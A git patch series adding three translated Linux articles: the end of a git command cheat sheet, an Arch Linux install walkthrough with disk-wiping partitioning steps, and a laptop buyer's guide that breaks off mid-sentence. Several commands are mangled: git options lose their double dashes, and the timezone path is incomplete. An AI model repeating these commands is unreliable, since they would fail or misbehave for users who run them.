[**How to install GIT on Linux (Ubuntu & CentOS)**][1] ) + +### Setting user information + +This should the first step after installing git. We will add user information (user name & email), so that the when we commit the code, commit messages will be generated with the user information which makes it easier to keep track of the commit progress. To add user information about user, command is 'git config' + + **$ git config - - global user.name "Daniel"** + + **$ git config - - global user.email "dan.mike@xyz.com"** + +After adding the information, we will now check if the information has been updated successfully by running, + + **$ git config - - list** + +& we should see our user information as the output. + +( **Also Read** : [**Scheduling important jobs with CRONTAB**][3] ) + +### GIT Commands + +#### Create a new repository + +To create a new repository, run + + **$ git init** + + +#### Search a repository + +To search a repository, command is + + **$ git grep "repository"** + + +#### Connect to a remote repository + +To connect to a remote repository, run + + **$ git remote add origin remote_server** + +Then to check all the configured remote server, + + **$ git remote -v** + + +#### Clone a repository + +To clone a repository from a local server, run the following commands + + **$ git clone repository_path** + +If we want to clone a repository locate at remote server, then the command to clone the repository is, + + **$ git clone[[email protected]][2] :/repository_path** + + +#### List Branches in repository + +To check list all the available & the current working branch, execute + + **$ git branch** + + +#### Create new branch + +To create & use a new branch, command is + + **$ git checkout -b 'branchname'** + + +#### Deleting a branch + +To delete a branch, execute + + **$ git branch -d 'branchname'** + +To delete a branch on remote repository, execute + + **$ git push origin : 'branchname'** + + +#### Switch to another branch + +To switch to another branch from current branch, use + + **$ git checkout 'branchname'** + + +#### Adding files + +To add a file to the repo, run + + **$ git add filename** + + +#### Status of files + +To check status of files (files that are to be commited or are to added), run + + **$ git status** + + +#### Commit the changes + +After we have added a file or made changes to one, we will commit the code by running, + + **$ git commit -a** + +To commit changes to head and not to remote repository, command is + + **$ git commit -m "message"** + + +#### Push changes + +To push changes made to the master branch of the repository, run + + **$ git push origin master** + + +#### Push branch to repository + +To push the changes made on a single branch to remote repository, run + + **$ git push origin 'branchname'** + +To push all branches to remote repository, run + + **$ git push -all origin** + + +#### Merge two branches + +To merge another branch into the current active branch, use + + **$ git merge 'branchname'** + + +#### Merge from remote to local server + +To download/pull changes to working directory on local server from remote server, run + + **$ git pull** + + +#### Checking merge conflicts + +To view merge conflicts against base file, run + + **$ git diff -base 'filename'** + +To see all the conflicts, run + + **$ git diff** + +If we want to preview all the changes before merging, execute + + **$ git diff 'source-branch' 'target-branch'** + + +#### Creating tags + +To create tags to mark any significant changes, run + + **$ git tag 'tag number' 'commit id'** + +We can find commit id by running, + + **$ git log** + + +#### Push tags + +To push all the created tags to remote server, run + + **$ git push -tags origin** + + +#### Revert changes made + +If we want to replace changes made on current working tree with the last changes in head, run + + **$ git checkout -'filename'** + +We can also fetch the latest history from remote server & point it local repository's master branch, rather than dropping all local changes made. To do this, run + + **$ git fetch origin** + + **$ git reset -hard master** + +That's it guys, these are the commands that we can use with git server. We will be back soon with more interesting tutorials. If you wish that we write a tutorial on a specific topic, please let us know via comment box below. As usual, your comments & suggestions are always welcome. + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/beginners-to-pro-guide-for-git-commands/ + +作者:[Shusain][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1] http://linuxtechlab.com/install-git-linux-ubuntu-centos/ +[2] /cdn-cgi/l/email-protection +[3] http://linuxtechlab.com/scheduling-important-jobs-crontab/ +[4] https://www.facebook.com/linuxtechlab/ +[5] https://twitter.com/LinuxTechLab +[6] https://plus.google.com/+linuxtechlab +[7] http://linuxtechlab.com/contact-us-2/ From cb4b61e45f5c86fbb3c97d5074de67b539624825 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 16:56:42 +0800 Subject: [PATCH 0550/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Inst?= =?UTF-8?q?all=20Arch=20Linux=20[Step=20by=20Step=20Guide]?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Install Arch Linux [Step by Step Guide].md | 283 ++++++++++++++++++ 1 file changed, 283 insertions(+) create mode 100644 sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md diff --git a/sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md b/sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md new file mode 100644 index 0000000000..f0e5df3785 --- /dev/null +++ b/sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md @@ -0,0 +1,283 @@ +How to Install Arch Linux [Step by Step Guide] +====== +**Brief: This tutorial shows you how to install Arch Linux in easy to follow steps.** + +[Arch Linux][1] is a x86-64 general-purpose Linux distribution which has been popular among the [DIY][2] enthusiasts and hardcore Linux users. The default installation covers only a minimal base system and expects the end user to configure and use it. Based on the KISS - Keep It Simple, Stupid! principle, Arch Linux focus on elegance, code correctness, minimalist system and simplicity. + +Arch Linux supports the Rolling release model and has its own package manager - [pacman][3]. With the aim to provide a cutting-edge operating system, Arch never misses out to have an up-to-date repository. The fact that it provides a minimal base system gives you a choice to install it even on low-end hardware and then install only the required packages over it. + +Also, its one of the most popular OS for learning Linux from scratch. If you like to experiment with a DIY attitude, you should give Arch Linux a try. It's what many Linux users consider a core Linux experience. + +In this article, we will see how to install and set up Arch Linux and then a desktop environment over it. + +## How to install Arch Linux + +![How to install Arch Linux][4] + +![How to install Arch Linux][5] + +The method we are going to discuss here **wipes out existing operating system** (s) from your computer and install Arch Linux on it. So if you are going to follow this tutorial, make sure that you have backed up your files or else you'll lose all of it. You have been warned. + +But before we see how to install Arch Linux from a USB, please make sure that you have the following requirements: + +### Requirements for installing Arch Linux: + + * A x86_64 (i.e. 64 bit) compatible machine + * Minimum 512 MB of RAM (recommended 2 GB) + * At least 1 GB of free disk space (recommended 20 GB for basic usage) + * An active internet connection + * A USB drive with minimum 2 GB of storage capacity + * Familiarity with Linux command line + + + +Once you have made sure that you have all the requirements, let's proceed to install Arch Linux. + +### Step 1: Download the ISO + +You can download the ISO from the [official website][6]. Arch Linux requires a x86_64 (i.e. 64 bit) compatible machine with a minimum of 512 MB RAM and 800 MB disk space for a minimal installation. However, it is recommended to have 2 GB of RAM and at least 20 GB of storage for a GUI to work without hassle. + +### Step 2: Create a live USB of Arch Linux + +We will have to create a live USB of Arch Linux from the ISO you just downloaded. + +If you are on Linux, you can use **dd command** to create a live USB. Replace /path/to/archlinux.iso with the path where you have downloaded ISO file, and /dev/sdx with your drive in the example below. You can get your drive information using [lsblk][7] command. +``` +dd bs=4M if=/path/to/archlinux.iso of=/dev/sdx status=progress && sync +``` + +On Windows, there are several tools to create a live USB. The recommended tool is Rufus. We have already covered a tutorial on [how to create a live USB of Antergos Linux using Rufus][8] in the past. Since Antergos is based on Arch, you can follow the same tutorial. + +### Step 3: Boot from the live USB + +Once you have created a live USB for Arch Linux, shut down your PC. Plugin your USB and boot your system. While booting keep pressing F2, F10 or F1dependinging upon your system) to go into boot settings. In here, select to boot from USB or removable disk. + +Once you select that, you should see an option like this: + +![Arch Linux][4] + +![Arch Linux][9] +Select Boot Arch Linux (x86_64). After various checks, Arch Linux will boot to login prompt with root user. + +Select Boot Arch Linux (x86_64). After various checks, Arch Linux will boot to login prompt with root user. + +Next steps include partitioning disk, creating the filesystem and mounting it. + +### Step 4: Partitioning the disks + +The first step includes partitioning your hard disk. A single root partition is the simplest one where we will create a root partition (/), a swapfile and home partition. + +I have a 19 GB disk where I want to install Arch Linux. To create a disk, type +``` +fdisk /dev/sda +``` + +Type "n" for a new partition. Type in "p" for a primary partition and select the partition number. + +The First sector is automatically selected and you just need to press Enter. For Last sector, type the size you want to allocate for this partition. + +Create two more partitions similarly for home and swap, and press 'w' to save the changes and exit. + +![root partition][4] + +![root partition][10] + +### Step 4: Creating filesystem + +Since we have created 3 different partitions, the next step is to format the partition and create a filesystem. + +We will use mkfs for root and home partition and mkswap for creating swap space. We are formatting our disk with ext4 filesystem. +``` +mkfs.ext4 /dev/sda1 +mkfs.ext4 /dev/sda3 + +mkswap /dev/sda2 +swapon /dev/sda2 +``` + +Lets mount these filesystems to root and home +``` +mount /dev/sda1 /mnt +mkdir /mnt/home +mount /dev/sda3 /mnt/home +``` + +### Step 5: Installation + +Since we have created partitioning and mounted it, let's install the base package. A base package contains all the necessary package to run a system, some of which are the GNU BASH shell, data compression tool, file system utilities, C library, compression tools, Linux kernels and modules, library packages, system utilities, USB devices utilities, vi text editor etc. +``` +pacstrap /mnt base base-devel +``` + +### **Step 6: Configuring the system** + +Generate a fstab file to define how disk partitions, block devices or remote file systems are mounted into the filesystem. +``` +genfstab -U /mnt >> /mnt/etc/fstab +``` + +Change root into the new system, this allows changing the root directory for the current running process and the child process. +``` +arch-chroot /mnt +``` + +Some systemd tools which require an active dbus connection can not be used inside a chroot, hence it would be better if we exit from it. To exit chroot, simpy use the below command: +``` +exit +``` + +### Step 7. Setting Timezone + +Use below command to set the time zone. +``` +ln -sf /usr/share/// /etc/localtime +``` + +To get a list of zone, type +``` +ls /usr/share/zoneinfo +``` + +Run hwclock to set the hardware clock. +``` +hwclock --systohc --utc +``` + +### Step 8. Setting up Locale. + +File /etc/locale.gen contains all the local settings and system language in a commented format. Open the file using vi editor and un-comment the language you prefer. I had done it for **en_GB.UTF-8**. + +Now generate the locale config in /etc directory file using the commands below: +``` +locale-gen +echo LANG=en_GB.UTF-8 > /etc/locale.conf +export LANG=en_GB.UTF-8 +``` + +### Step 9. Installing bootloader, setting up hostname and root password + +Create a /etc/hostname file and add a matching entry to host. + +127.0.1.1 myhostname.localdomain myhostname + +I am adding ItsFossArch as a hostname: +``` +echo ItsFossArch > /etc/hostname +``` + +and then to the /etc/hosts file. + +To install a bootloader use below commands : +``` +pacman -S grub +grub-install /dev/sda +grub-mkconfig -o /boot/grub/grub.cfg +``` + +To create root password, type +``` +passwd +``` + +and enter your desired password. + +Once done, update your system. Chances are that you already have an updated system since you have downloaded the latest ISO file. +``` +pacman -Syu +``` + +Congratulations! You have successfully installed a minimal command line Arch Linux. + +In the next step, we will see how to set up a desktop environment or Graphical User Interface for the Arch Linux. I am a big fan of GNOME desktop environment, and we will be working on installing the same. + +### Step 10: Install a desktop environment (GNOME in this case) + +Before you can install a desktop environment, you will need to configure the network first. + +You can see the interface name with below command: +``` +ip link +``` + +![][4] + +![][11] + +For me, it's **enp0s3.** + +Add the following entries in the file +``` +vi /etc/systemd/network/enp0s3.network + +[Match] +name=en* +[Network] +DHCP=yes +``` + +Save and exit. Restart your systemd network for the changes to reflect. +``` +systemctl restart systemd-networkd +systemctl enable systemd-networkd +``` + +And then add the below two entries in /etc/resolv.conf file. +``` +nameserver 8.8.8.8 +nameserver 8.8.4.4 +``` + +Next step is to install X environment. + +Type the below command to install the Xorg as display server. +``` +pacman -S xorg xorg-server +``` + +gnome contains the base GNOME desktop. gnome-extra contains GNOME applications, archive manager, disk manager, text editors and more. +``` +pacman -S gnome gnome-extra +``` + +The last step includes enabling the display manager GDM for Arch. +``` +systemctl start gdm.service +systemctl enable gdm.service +``` + +Restart your system and you can see the GNOME login screen. + +## Final Words on Arch Linux installation + +A similar approach has been demonstrated in this video (watch in full screen to see the commands) by It's FOSS reader Gonzalo Tormo: + +You might have realized by now that installing Arch Linux is not as easy as [installing Ubuntu][12]. However, with a little patience, you can surely accomplish it and then tell the world that you use Arch Linux. + +Arch Linux installation itself provides a great deal of learning. And once you have installed it, I recommend referring to its comprehensive [wiki][13] where you can find steps to install various other desktop environments and learn more about the OS. You can keep playing with it and see how powerful Arch is. + +Let us know in the comments if you face any difficulty while installing Arch Linux. + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/install-arch-linux/ + +作者:[Ambarish Kumar][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/ambarish/ +[1] https://www.archlinux.org/ +[2] https://en.wikipedia.org/wiki/Do_it_yourself +[3] https://wiki.archlinux.org/index.php/pacman +[4] data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= +[5] https://itsfoss.com/wp-content/uploads/2017/12/install-arch-linux-featured-800x450.png +[6] https://www.archlinux.org/download/ +[7] https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s1-sysinfo-filesystems +[8] https://itsfoss.com/live-usb-antergos/ +[9] https://itsfoss.com/wp-content/uploads/2017/11/1-2.jpg +[10] https://itsfoss.com/wp-content/uploads/2017/11/4-root-partition.png +[11] https://itsfoss.com/wp-content/uploads/2017/12/11.png +[12] https://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/ +[13] https://wiki.archlinux.org/ From e3b8228534b0833ea982aee72c8e4a6a6844c4b1 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 17:07:36 +0800 Subject: [PATCH 0551/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20The=20Best=20Li?= =?UTF-8?q?nux=20Laptop=20(2017-2018):=20A=20Buyer=E2=80=99s=20Guide=20wit?= =?UTF-8?q?h=20Picks=20from=20an=20RHCE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...A Buyer’s Guide with Picks from an RHCE.md | 224 ++++++++++++++++++ 1 file changed, 224 insertions(+) create mode 100644 sources/tech/20171210 The Best Linux Laptop (2017-2018)- A Buyer’s Guide with Picks from an RHCE.md diff --git a/sources/tech/20171210 The Best Linux Laptop (2017-2018)- A Buyer’s Guide with Picks from an RHCE.md b/sources/tech/20171210 The Best Linux Laptop (2017-2018)- A Buyer’s Guide with Picks from an RHCE.md new file mode 100644 index 0000000000..3305e9c11b --- /dev/null +++ b/sources/tech/20171210 The Best Linux Laptop (2017-2018)- A Buyer’s Guide with Picks from an RHCE.md @@ -0,0 +1,224 @@ +The Best Linux Laptop (2017-2018): A Buyer’s Guide with Picks from an RHCE +====== +![][1] + +If you don't posses the right knowledge & the experience, then finding the best Linux laptop can be a daunting task. And thus you can easily end-up with something that looks great, features great performance, but struggles to cope with 'Linux', shame! So, as a **RedHat Certified Engineer** , the author & the webmaster of this blog, and as a **' Linux' user with 14+ years of experience**, I used all my knowledge to recommend to you a couple of laptops that I personally guarantee will let you run 'Linux' with ease. After 20+ hours of research (carefully looking through the hardware details & reading user feedback) I chose [Dell XP S9360-3591-SLV][2], at the top of the line. If you want a laptop that's equipped with modern features & excellent performance **that 'just works' with Linux**, then this is your best pick. + +It's well built (aluminium chassis), lightweight (2.7 lb), features powerful hardware, long battery life, includes an excellent 13.3 inch Gorilla Glass touchscreen with 3200×1800 QHD resolution which should give you excellently sharp images without making anything too small & difficult to read, a good & roomy track-pad (earlier versions had a few issues with it, but now they seem to be gone) with rubber-like palm rest area and a good keyboard (the key travel is not deep, but it's a very think laptop so…) with Backlit, two USB 3.0 ports. Most importantly, two of the most common elements of a laptop that can give 'Linux' user a headache, the wireless adapter & the GPU (yes the Intel HD Graphics 620 **can play 4K videos at 60fps** ), they are both **super compatible with 'Linux'** on this Dell. + +![][3] + +![][4] + +One drawback is that it doesn't have an HDMI port. In its place, Dell has added a Thunderbolt 3 port. So your only option is to use a Thunderbolt to HDMI converter (they're pretty cheap). Secondly, you can't upgrade the 8GB of RAM after purchasing (you can change the hardware configuration -- CPU, RAM & SSD, before purchasing), but in my opinion, 8GB is more than enough to run any 'Linux' distribution for doing everyday tasks with ease. I for one have an Asus laptop (received it as a gift) with a 5th generation of Core i7, 4GB of RAM, I use it as my main computer. With Chrome having opened 15-20 tabs, VLC running in the background, file manager & a code editor opened, it handles it with ease. If I cut back some of the browser tabs (say reduce them to to 4-5), then with the rest of the apps opened, I can even work with a virtual machine on Virtualbox. That's with having 4GB of RAM, so with 8GB of RAM and other more powerful hardware, you should be absolutely fine. + +> **Note:** I 've chosen a solid set of [hardware for you][2], but if you want, you can further customize it. However, don't choose the '8GB RAM/128GB SSD' option. Because that version gives you the 1920×1080 FHD screen, and that resolution on a 13.3″ screen can make things like menus to appear a bit smaller, slightly difficult to read. + +### **Best Cheap Linux Laptop** + +![][5] + +If the Dell is a bit pricey and you want something that is affordable, but still gives you surprisingly similar performance & really good compatibility on 'Linux, then your 2nd best option is to go for the [Acer Aspire E 15 E5-575G-57D4][6]. Its 15.6″ display is certainly not as good as the one Dell gives you, but the 1920×1080 Full HD resolution should still fits nicely with the 15.6″ screen making things sharp & clear. The rest of the hardware is actually very similar to the ones the more pricier Dell gives you, but **at 5.2 lb it 's a little heavy.** + +You can actually customize it a lot. The basic setup includes a 7th generation Core i5 CPU, 15.6 inch FullHD (1920 x 1080) screen, 8GB of DDR4 RAM, 256GB SSD drive, Intel HD Graphics 620 GPU and also a separate (discreet) Nvidia 940 MX GPU, for ports: HDMI 2 USB 3.0, 1 x USB 2.0 & 1 USB 3.1. For $549, it also **includes a DVD burner** … [**it 's a bargain**][6]. + +As far as the 'Linux' compatibility goes, it's really good. It may not be top notched as the Dell XPS, yet, as far as I can see, if there is one thing that can give you troubles it's that Nvidia GPU. Except for one user, all the others who have given feedback on its 'Linux' compatibility say it runs very smoothly. Only one user has complained that he came up with a minor issue after installing the proprietary Nvidia driver in Linux Mint, but he says it's certainly not a deal breaker. This feedback is also in accordance with my experience with a mobile Nvidia GPU as well. + +For instance, nowadays I use an Asus laptop and apart from the integrated Intel GPU, it also comes with a discreet Nvidia 920M GPU. I've been using it for about an year and a half. [I've run couple of 'Linux' distributions on it][7], and the only major issue I've had so far was that after installing the proprietary driver [on Ubuntu 17.10][8] and activating Nvidia as the default GPU the auto-user-login function stopped working. And every time I had to enter my login details at the login screen for entering into the desktop. It's nowhere near being a major issue, and I'm sure it could've been fixed by editing some configuration settings of the login-manager, but I didn't even care because I rarely use the Nvidia GPU. Therefore, I simply changed the GPU back to Intel and all was back to normal. Also, a while ago I [enabled 'Motion Interpolation' on the same Nvidia GPU][9] on [Ubuntu 16.04 LTS][10] and everything worked like a charm! + +What I'm trying to say is that GPU drivers such as those from Nvidia & AMD/ATI used give users a real hard time in the past in 'Linux', but nowadays things have progressed a lot, or so it seems. Unless you have at your disposal a very recently released high-end GPU, chances are 'Linux' is going to work without lots of major issues. + +### **Linux Gaming Laptop** + +![][11] + +Most of the time, with gaming laptops, you'll have to manually tweak things a bit. And those 'things' are mostly associated with the GPU. It can be as simple as installing the proprietary driver, to dealing with a system that refuses even to boot into the live CD/USB. But with enough patience, most of the time, they can be fixed. If your gaming laptop comes with a very recently released Nvidia/AMD GPU and if the issue is related to the driver, then fixing it simply means waiting for an updated driver. Sometimes that can take time. But if you buy a laptop with a GPU that's released a couple of months ago, then that alone should increase your chances of fixing any existing issues to a great degree. + +So with that in mind, I've chosen the [Dell Inspiron i5577-7342BLK-PUS][12] as the gaming laptop choice. It's a powerful gaming laptop that has a power tag below 1000 bucks. The reason being is the 15.6″ FullHD (1920 x 1080) display mostly. Because when you look at the rest of the configuration (yes you can further customize it), it includes a 7th generation Core i7 CPU (quad-core), 16GB DDR4 RAM (up to 32GB), 512GB SSD drive and an Nvidia GTX 1050 GPU which has received lots of positive reviews. You won't be able to play high-end games in QHD or 4K resolutions with it say on an external display, but it can handle lots of games in FullHD resolution on its 15.6″ display nonetheless. + +And the other reason I've chosen a Dell over the other is, for some reason, most Dell laptops (or computers in general) are quite compatible with 'Linux'. It's pretty much the same with this one as well. I've manually checked the hardware details on Dell, while I cannot vouch for any issues you might come up with that Nvidia GPU, the rest of the hardware should work very well on major 'Linux' distributions (such as with Ubuntu for instance). + +### **Is that it?** + +Actually yes, because I believe less is better. + +Look, I could've added bunch of laptops here and thrust them at you by 'recommending' them. But I take very seriously what I do on this blog. So I can't just 'recommend' 10-12 laptops unless I'm confident that they're suited to run 'Linux' as smoothly as possible. While the list is at the moment, confined to 3 laptops, I've made sure that they will run 'Linux' comfortably (again, even with the gaming laptop, apart from the Nvidia GPU, the rest of the hardware SHOULD work), plus, the three models should cover requirements of a large audience in my opinion. That said, as time goes on, if I find laptops from other manufactures I can predict with confidence that will run 'Linux' quite well, then I'll add them. But for now, these are my recommendations. However, if you're not happy with these recommendations, then below are couple of simple things to look for. Once you get the basic idea, you can pretty easily predict with good accuracy whether a laptop is going to give you a difficult time running 'Linux' or not. I've already mentioned most of them above, but here they are anyway. + + * **Find more information about the hardware:** + + + +When you come up with a laptop take a note of its model. Now, on most websites, details such as the manufacturer of the Wireless adapter or the audio chip etc aren't given. But on most occasions such information can be easily extracted using a simple trick. And this is what I usually do. + +If you know the model number and the manufacturer of the laptop, just search for its drivers in Google. Let's take the Dell gaming laptop I just mentioned as an example. If you take its name and search for its drivers in Google ('`Dell Inspiron i5577-7342BLK-PUS drivers`'), Google doesn't display an official Dell drivers page. This is not surprising because Dell (and other manufactures) sell laptops under the same generic model name with few (2 or three) hardware variations. So, to further narrow things down, starting from the left side, let's use the first three fields of the name and search for its drivers in Google ('`Dell Inspiron i5577 drivers`'), then as shown below, Google lists us, among other websites, an official Dell's drivers page for the Inspiron 5577 (without the 'i'). + +![][13] + +If you enter into this page and look around the various drivers & hardware listed there and compare them with the model we're interested in, then you'll see that the hardware listed in the '`Dell Inspiron i5577-7342BLK-PUS`' are also listed there. I'm usually more keen to look for what's listed under 'audio' & 'network', because the exact model names of these chips are the most difficult to obtain from a buyer's website and others such as the GPU, CPU etc are listed. So if you look what's displayed under 'network' then you'll see that Dell gives us couple of drivers. One is for Realtek Ethernet adapter (Ethernet adapter are usually well supported in 'Linux'), Qualcomm QCA61x4A-QCA9377 Wireless adapter (if you further research the 'QCA61x4A' & 'QCA9377' separately, because they're separated by '-', then you'll find that these are actually two different yet very similar Wireless chips from Qualcomm. In other words, Dell has included two drivers in a single package), and couple of Intel wireless adapters (Intel hardware too is well supported in 'Linux'). + +But Qualcomm devices can sometimes give issues. I've come up with one or two, but none of it were ever major ones. That said, when in doubt, it's always best to seek. So take that 'Qualcomm QCA61x4A-QCA9377' (it doesn't really matter if you use one adapter or use the two names combined) and add to it a keyword like 'linux' or 'ubuntu' and Google it. If I search for something like 'Qualcomm QCA61x4A-QCA9377 ubuntu' then Google lists few results. The first one I get is from [AskUbuntu][14] (a community driven website dedicated to answer end-user's Q & A, excellent resource for fixing issues related to Ubuntu). + +![][15] + +If you go over to that page then you can see that the user complains that Qualcomm QCA9377 wireless adapter is giving him hard time on Ubuntu 15.10. Fortunately, that question has been answered. Plus, this seems to be an issue with Ubuntu 15.10 which was released back in October 2015, so this is two years ago. So there is a high probability that this particular issue is already fixed in the latter Ubuntu releases. Also remember that, this issue seem to related to the Qualcomm QCA9377 wireless chip not the QCA61x4A. So if our 'Linux' gaming Dell laptop has the latter chip, then most probably you wouldn't come up with this at all. + +I hope I didn't over complicate things. I just wanted to give you a pointer on how to find subtle details about the hardware of the laptop that you're hoping to run 'Linux', so that you can better evaluate the situation. Use this technique with some common sense, and with experience, you'll become very efficient at it. + + * **Don 't stop at the GPU & the Network Adapter:** + + + +![][16] + +While its true that the GPU and the Network adapter are among the two most common hardware devices that give you big issues in 'Linux' since you're buying a laptop, it's always good practice to research the compatibility of the audio, the touch-pad and the keyboard & its associated features (for instance, my old Dell's Backlit keyboard had a minor issue under 'Linux'. Backlit keyboards can give minor issues in 'Linux', again, it's from experience) as well. + + * **If it 's too 'hot', wait 2-3 months:** + + + +As far as the computer end-users are concerned, the market share of 'Linux' is quite small. Therefore, hardware manufacturers don't take 'Linux' seriously, yet. Thus, it take them a bit longer to fix any existing major issues with the drivers of their recently released hardware devices. This is even true to open-source drivers also, but they tend to come up with 'fixes' fast compared to proprietary ones in my experience. So, if you're buying a laptop that features hardware devices (mainly CPU & the GPU) that have been very recently released, then it's better to wait 2 or 3 months before buying the laptop to see if there are any major issues in 'Linux'. And hopefully by that time, you'll be able to find a fix or at least to predict when the fix is mostly likely to arrive. + + * **What about the Screen & HiDPI support in 'Linux'?** + + + +![][17] + +'Pixel density' or 'High Pixel Density' displays are quite popular terms these days. And most people assume that having lots of pixels means better quality. While that maybe true with the common intuition, technically speaking, it's not accurate. This subject can be bit too complicated to understand, so I'll just go ever the basics so that you'll know enough to avoid unnecessary confusion. + +Things that are displayed on your screen such as texts and icons are designed with certain fixed sizes. And these sizes are defined by what is called 'Dots per inch' or 'DPI' for short. This basically defines how many dots (pixels) there should be per inch for these items to appear correctly. And 72 dots per inch is the standard set by Apple and that's what matters. I'm sure you've heard that Windows use a different standard, 96 dots per inch, but that is not entirely correct. I'm not going to go into the details, but if you want to know more, [read Wikipedia][18]. In any case, all that you want to know to make sure that the display screen of your 'Linux' laptop is going to look sharp and readable simultaneously, is to do the following. First take a note of its size (13.3″, 15.6″, 17″…) and the resolution. Then go to [PXCALC.com][19] website which gives you a nice dots per inch calculator. Then enter the values in the correct fields. Once done, take a note of the DPI value the calculator gives you (it's on the top right corner, as shown below). Then take that value and simply divide it by 72, and here's the crucial part. + +![][20] + +If the answer you get resembles an integer increase such as 2, 3, 4 (+0.2 -- 0.2 variation is fine. The best ones may give you +0.1 -- 0.1 variation only. The finest will give you near 0.0 ones, such as the iMac 27 5K) then you have nothing to worry about. The higher the integer increase is (provided that the variation stays within the margins), the more sharper the screen is going to be. To give you a better idea, let's take an example. + +Take the first laptop I gave you (Dell XPS 13.3″ with the QHD resolution) as an example. Once you're done with the calculation it'll give you answer '3.83' which roughly equals to '3.8' which is not an integer but as pointed out, it's safely within the margin (-0.2 to be precise). If you do the same calculation with the Acer laptop I recommend to you as the best cheapest option, then it'll give you a value of '1.95' which is roughly '2.0'. So other features (brightness, viewing angle etc) aside, the display on Dell is almost twice as sharp compared to Acer (trust me, this display still looks great and sharp. It'll look far better compared to a resolution of 1366 x 768 on either a 13.3″ or a 15.6″ screen). + + * **RAM Size?** + + + +![][21] + +KDE and GNOME are the two most popular desktop environments in 'Linux'. While there are many others, I advice you to stick with one of them. These days my preference lies with KDE. KDE plasma is actually more lightweight & efficient compared to GNOME, as far as I can tell. If you want some numbers, then in [my Ubuntu 16.10 flavors review][22] (which is about an year old now), KDE plasma consumed about 369 MiB while GNOME edition of Ubuntu consumed 781 MiB! That's **112% increase!** + +These days I use Kubuntu 17.10, although I haven't reviewed it, but I can tell that its memory consumption too is somewhere around 380-400 MiB. Coming back to the point, I would like to advice you **not to go below 8GB** when it comes to choosing RAM size for your 'Linux' laptop. That way, I can guarantee with great probability that you'll be able to use it for at least 4 years into the future without having to worry about laptop becoming slow and not being able to cope with the requirements set by distribution vendors and by most end-users. + +If you're looking for **a laptop for gaming in 'Linux'**, then of course you should **go 12GB or more**. Other than that, 8GB is more than enough for most end-user needs. + + * **What about an SSD?** + + + +![][23] + +Despite what operating system you use, adding an SSD will improve the overall performance & responsiveness of your laptop immediately because they are much faster than the rotational disks, as simple as that. That being said, in my experience, even though efficient and lightweight, KDE distributions take more time to boot compared to GNOME counterparts. Some 'Linux' distributions such as Ubuntu and Kubuntu come with a especially designed utility called 'ureadahead' that improves boot-up times (sometimes by **30%** or even more), unfortunately not all distributions come with such tools. And on such occasions, **KDE can take 50 seconds+ to boot on a 5400 rpm SATA drive**. [Manjaro 17.0.2 KDE][24] is one such example (shown in the graph above). + +Thus, by simply making sure to buy a laptop that features an SSD can immensely help you out. **My Kubuntu 17.10 is on a smaller SSD drive (20GB) and it boots within 13-15 seconds**. + + * **The GPU?** + + + +As mentioned many time, if possible, always go with an Intel GPU. Just like Dell who's known to produce 'Linux friendly' hardware, Intel has also thoroughly invested in open-source projects, and some of its hardware too is such like. You won't regret it. + + * **What about automatic GPU switching (e.g: Nvidia Optimus), will it work?** + + + +If you're bought a laptop with a discreet graphics card, then in Windows, Nvidia has a feature called 'Optimus' which automatically switch between the integrated (weak) GPU and the discreet (more capable) GPU. ATI also has this capability. There is no official support of such features in 'Linux', but there are experimental work such as the [Bumblebee project][25]. But it does not always work as expected. I simply prefer to have installed the proprietary GPU driver and switch between each whenever I want, manually. To their credit, Fedora team has also been working on a solution of their own, I don't honestly know how far they've gone. Better [ask Christian][26] I guess. + + * **Can 'Linux' give you good battery life?** + + + +Of course it can! Once your hardware devices are properly configured, I recommend that you install a power usage optimizer. There are a few applications, but I recommend '[TLP][27]'. It's easy to install, cuts down the power usage impressively in my experience, and usually it requires no manual tweaks to work. + +Below are two screenshots from my latest Ubuntu 17.10 review. First screenshot shows the power usage before installing 'tlp' and the second one shows the readings after installing it (the pictures say it all): + +![][28] + +![][29] + +'tlp' should be available in major 'Linux' distributions. On Ubuntu based ones, you should be able to install it by issuing the following commands: + +`sudo apt update` + +`sudo apt install tlp` + +Now reboot the computer, and you're done! + + * **How did you measure the power usage in 'Linux'?** + + + +Glad you asked! It's called '[powerstat][30]'. It's this amazing little utility (designed by Colin King, an Ubuntu developer) that gathers useful data that's related to power consumption (and debugging) and puts them all into a single screen. On Ubuntu based systems, enter the below commands to install it: + +`sudo apt update` + +`sudo apt install powerstat` + +Most major 'Linux' distributions make it available through their software repositories these days. + + * **Are there any 'Linux' operating systems you recommend?** + + + +Well, my main operating system these days is Kubuntu 17.10. Now I have not reviewed it, but to make a long story short, I love it! It's very easy to install, beginner friendly, stable, beautiful, power efficient and easy to use. These days I literally laugh at GNOME! So if you're new to 'Linux', then I advice you to [try Kubuntu ][31] or [Linux Mint][32], first ('Mint' gives you couple of desktop choices. Go with either the KDE version or with 'Cinnamon'). + +Then once you get the hang of things, then you can move on to others, that's the best approach for a beginner. + +### **Final Words** + +Recall what I said at the beginning. If you're looking for a laptop that runs 'Linux' almost effortlessly, then by all means go with the [Dell XP S9360-3591-SLV][2]. It's a well build, powerful, very popular, ultra-portable laptop that not 